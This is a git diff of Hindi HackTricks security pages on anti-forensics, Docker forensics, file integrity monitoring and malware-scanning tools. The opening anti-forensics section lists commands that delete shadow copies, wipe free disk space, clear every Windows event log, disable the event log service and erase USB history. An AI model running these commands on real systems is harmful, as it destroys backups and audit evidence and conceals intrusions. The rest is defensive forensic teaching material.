`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`। **इसे हटाने** से आप USB इतिहास को हटा देंगे।\ +आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और उन्हें हटाने के लिए)। -एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है, वह है फ़ाइल `setupapi.dev.log` `C:\Windows\INF` के अंदर। इसे भी हटाया जाना चाहिए। +एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है वह है `setupapi.dev.log` जो `C:\Windows\INF` के अंदर होती है। इसे भी हटाना चाहिए। ## शैडो कॉपियों को अक्षम करें `vssadmin list shadowstorage` के साथ शैडो कॉपियों की **सूची** बनाएं\ -उन्हें रन करके हटाएं `vssadmin delete shadow` +उन्हें रन करके `vssadmin delete shadow` को **हटाएं** -आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [यहाँ प्रस्तावित चरणों](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) का पालन करें। +आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) में प्रस्तावित चरणों का पालन करें। शैडो कॉपियों को अक्षम करने के लिए [यहाँ से चरण](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके। -2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुँचें। +1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके खोल सकते हैं। +2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुंचें। 3. "स्टार्टअप प्रकार" ड्रॉप-डाउन मेनू से "डिसेबल्ड" चुनें, और फिर बदलाव की पुष्टि करने के लिए "एप्लाई" और "ओके" पर क्लिक करें। -यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी, उसकी विन्यास को संशोधित किया जा सकता है। +यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी उनके विन्यास को संशोधित किया जा सके। ## हटाएं हटाए गए फ़ाइलें * आप एक **Windows उपकरण** का उपयोग कर सकते हैं: `cipher /w:C` यह cipher को सी ड्राइव के उपलब्ध अप्रयुक्त डिस्क स्थान से किसी भी डेटा को हटाने के लिए संकेत देगा। * आप [**Eraser**](https://eraser.heidi.ie) जैसे उपकरण भी उपयोग कर सकते हैं -## हटाएं Windows घटना लॉग +## हटाएं विंडोज घटना लॉग -* Windows + R --> eventvwr.msc --> "Windows Logs" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें +* विंडोज + R --> eventvwr.msc --> "विंडोज लॉग" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` -## Windows घटना लॉग को अक्षम करें +## विंडोज घटना लॉग को अक्षम करें * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* सेवाओं खंड के अंदर सेवा "Windows Event Log" को अक्षम करें +* सेवाओं के भीतर सेवा "विंडोज घटना लॉग" को अक्षम करें * `WEvtUtil.exec clear-log` या `WEvtUtil.exe cl` ## $UsnJrnl को अक्षम करें diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index a33d827c9..60ba49cf1 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,22 +1,23 @@ # डॉकर फोरेंसिक्स +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} ## कंटेनर संशोधन -कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था: +कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES @@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है।\ -अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं: +पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**। +अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है। ```bash docker cp wordpress:/etc/shadow. ``` -आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**: +आप एक नए कंटेनर को चला कर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container @@ -53,14 +54,14 @@ docker exec -it wordpress bash ``` ## छवि संशोधन -जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों का सारांश निकालने** के लिए: +जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग करके **संशोधनों का सारांश निकाल सकते हैं**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: +फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संदेहपूर्ण फ़ाइलें खोज सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं: ```bash tar -xf image.tar ``` @@ -70,7 +71,7 @@ tar -xf image.tar ```bash docker inspect ``` -आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं: +आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं: ```bash docker history --no-trunc ``` @@ -90,16 +91,16 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** को फोल्डर को संक्षिप्त/खोलने के लिए करें। +यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** अर्थात जोड़ी गई है और **पीला** अर्थात संशोधित है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** का उपयोग फ़ोल्डर को संक्षेपित/खोलने के लिए करें। इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\ -आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके: +आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं जो इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` ## मेमोरी से क्रेडेंशियल्स -ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर +ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रक्रियाएँ देख सकते हैं** बस `ps -ef` चलाकर -इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** की खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। +इसलिए (रूट के रूप में) आप **होस्ट से प्रक्रियाओं की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** के लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)। diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 82569c684..2233a39f7 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,40 +1,54 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -# मूल्यांकन +# मूलाधार -एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**। +एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है ताकि **भविष्य की स्थिति की तुलना करने के लिए परिवर्तनों को हाइलाइट किया जा सके**। -उदाहरण के लिए, आप फ़ाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\ -इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। +उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फाइलें संशोधित की गई थीं।\ +यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए। -## फ़ाइल अखंडता मॉनिटरिंग +## फाइल अखंडता मॉनिटरिंग -फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं: +फाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT परिवेश और डेटा को सुरक्षित रखती है। इसमें दो मुख्य चरण शामिल हैं: -1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें। -2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। +1. **मूलाधार तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके मूलाधार स्थापित करें ताकि संशोधनों का पता लगा सकें। +2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधन किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से। ## उपकरण * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# संदर्भ +## संदर्भ * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
+ +HackTricks का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index cef3300bc..d0afc3a0f 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # मैलवेयर विश्लेषण +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} ## फोरेंसिक्स चीटशीट्स @@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी ## ऑफलाइन एंटीवायरस और पहचान उपकरण -### Yara +### यारा #### स्थापित ```bash @@ -37,7 +38,7 @@ sudo apt-get install -y yara #### नियम तैयार करें इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम की फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। +_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नामक एक फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे। ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -48,9 +49,9 @@ python malware_yara_rules.py yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` -#### YaraGen: मैलवेयर की जांच करें और नियम बनाएं +#### YaraGen: मैलवेयर की जाँच करें और नियम बनाएं -आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सकते हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) +आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर सकते हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash python3 yarGen.py --update python3.exe yarGen.py --excludegood -m ../../mals/ @@ -67,11 +68,11 @@ sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` -### [कैपा](https://github.com/mandiant/capa) +### [Capa](https://github.com/mandiant/capa) -**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे: +**Capa** प्रोग्रामों में पोटेंशियली जानलेवा **क्षमताएँ** पहचानता है: PE, ELF, .NET। इसलिए यह चीजें खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे: -* OutputDebugString त्रुटि की जांच करें +* OutputDebugString त्रुटि की जाँच करें * सेवा के रूप में चलाएं * प्रक्रिया बनाएं @@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder ### IOCs -IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\ +IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्टि की गई **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में इस प्रकार के जानलेवा फ़ाइलों की **खोज के लिए** करती है।\ इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है। IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\ -आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**। +आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC की खोज के लिए**। -### लोकी +### Loki -[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\ +[**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान जानलेवा संकेतों के लिए।\ पहचान चार पहचान पद्धतियों पर आधारित है: ``` 1. File Name IOC @@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### लिनक्स मैलवेयर डिटेक्ट -[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है। +[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो लिनक्स के लिए GNU GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धारा डेटा का उपयोग करता है ताकि हमलों में सक्रिय रूप से उपयोग किया जा रहा मैलवेयर निकाल सके और पहचान के लिए सिग्नेचर उत्पन्न कर सके। साथ ही, धारा डेटा भी उपयोगकर्ता सबमिशन से लिया जाता है जिसमें LMD चेकआउट फीचर और मैलवेयर समुदाय संसाधन शामिल हैं। -### आरकेहंटर +### rkhunter -[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। +[**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है। ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` @@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।) +[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक चीजें जैसे binary data, entropy, URLs और IPs, कुछ yara rules की जांच करता है। ### PEstudio -[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा। +[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा। ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा। 